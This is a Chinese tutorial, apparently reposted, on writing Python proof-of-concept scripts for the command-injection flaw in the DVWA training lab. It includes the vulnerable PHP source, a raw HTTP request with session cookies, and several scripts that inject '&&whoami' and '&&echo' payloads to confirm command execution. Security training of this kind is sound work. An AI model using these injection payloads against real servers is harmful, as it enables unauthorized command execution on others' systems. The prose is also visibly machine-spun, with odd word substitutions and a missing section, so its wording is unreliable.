http://mihun-ip/2.1 漏洞剖析
user: adminpassword: password
登入DVWA系统,将 DVWA Security 修正为low,本次利用 Command Injection(命令注入) 模块作为这次POC验证漏洞点
Command Injection(命令注入) 模块用于验证网络是否通畅,由于对输入的参数检讨不严格导致任意命令实行
ping sechelper.cn && whoami
Command Injection 模块源码
<?phpif( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( 'ping ' . $target ); } else { // nix $cmd = shell_exec( 'ping -c 4 ' . $target ); } // Feedback for the end user echo "<pre>{$cmd}</pre>";}?>
剖析上面源码创造ip参数未过滤被带入命令实行函数shell_exec,利用linux/win命令特性拼接参数 sechelper.cn&&whoami
伪代码如下:
shell_exec( 'ping -c 4 ' . $target ) == shell_exec('ping -c 4 sechelper.cn&&whoami' );3 编写验证程序
利用PyCharm 创建一个python项目
3.1 剖析http数据包
利用火狐浏览器按 F12 开启Firebug开拓者模式,选择网络 重新触发漏洞不雅观察http要求
文件列 /vulnerabilities/exec/ 是接口地址,方法是 POST ,域名是 192.168.17.5 ,完全http要求包如下:
POST /vulnerabilities/exec/ HTTP/1.1Host: 192.168.17.5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 17Origin: http://192.168.17.5Connection: keep-aliveReferer: http://192.168.17.5/vulnerabilities/exec/Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=lowUpgrade-Insecure-Requests: 1ip=192.168.17.5&Submit=Submit
漏洞的信息已经知道的差不多,开始编写代码
# coding=utf-8import requestsurl = "http://192.168.17.5/vulnerabilities/exec/"data = {"ip": "sechelper.cn"}# 禁止跳转 allow_redirects = Falseresponse = requests.post(url, data, allow_redirects=False)print("状态: {}".format(response.status_code))print("302跳转地址:{}".format(response.next.url))
实行上面代码返回状态 302,不应该是200 吗?为什么返回 302 ?,不雅观察掌握台内打印出的跳转地址是登入界面,原来/vulnerabilities/exec/ 有授权验证,未授权会跳转到登入界面
3.3 要求授权接口
怎么才能授权呢?
这里就不剖析登入的过程了,登入信息保存在Cookie内,在要求头内加入 cookie 头
# coding=utf-8import requestsurl = "http://192.168.17.5/vulnerabilities/exec/"# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=lowheaders = {"cookie": "PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low"}data = {"ip": "sechelper.cn&&whoami", "Submit": "Submit"}# 禁止跳转 allow_redirects = Falseresponse = requests.post(url, data, allow_redirects=False, headers=headers)print("状态: {}".format(response.status_code))print("结果:{}".format(response.text))
从结果内看出代码已经可以访问并利用 /vulnerabilities/exec/ 存在漏洞接口,那么如何利用代码快速识别出漏洞是否存在呢?
3.4 快速验证漏洞两种方法特色办法匹配返回结果里的特色检测漏洞是否存在,匹配到 自定义 的字符则表示漏洞存在
# coding=utf-8import requestsurl = "http://192.168.17.5/vulnerabilities/exec/"# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=lowheaders = {"cookie": "PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low"}data = {"ip": "192.168.17.5&&echo sechelper", "Submit": "Submit"}# 禁止跳转 allow_redirects = Falseresponse = requests.post(url, data, allow_redirects=False, headers=headers)if response.status_code == 200 and response.text.find("sechelper") != -1: print("[] {} is weak".format(url))else: print("[x] {} is safe".format(url))print("Detection completed...")
关键输出办法输出关键信息人工判断是否成功,一些繁芜的漏洞利用须要利用这种办法
# coding=utf-8import requestsurl = "http://192.168.17.5/vulnerabilities/exec/"# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=lowheaders = {"cookie": "PHPSESSID=3eabqr5lprmsir8n0211bolpn1; security=low"}data = {"ip": "192.168.111.129&&echo sechelper", "Submit":"Submit"}# 禁止跳转 allow_redirects = Falseresponse = requests.post(url, data, allow_redirects=False, headers=headers, timeout=5)if response.status_code == 200: from bs4 import BeautifulSoup soup = BeautifulSoup(response.text, 'lxml') # 在html找到第一个pre标签并返回,取出内容便是命令实行的结果 pre = soup.find("pre") print("[] response {}".format(pre.text))print("Detection completed...")4 结束语
渗透过程中自己写脚本可以更方便快捷的做一些事情,渗透测试很难全程自动化,写一些小工具可以显著提高渗透效率,想要做一个合格白帽子会一门措辞是很有必要的。关注至察助安微信公众年夜众号,专注网络安全优质知识分享,无优质,不分享。
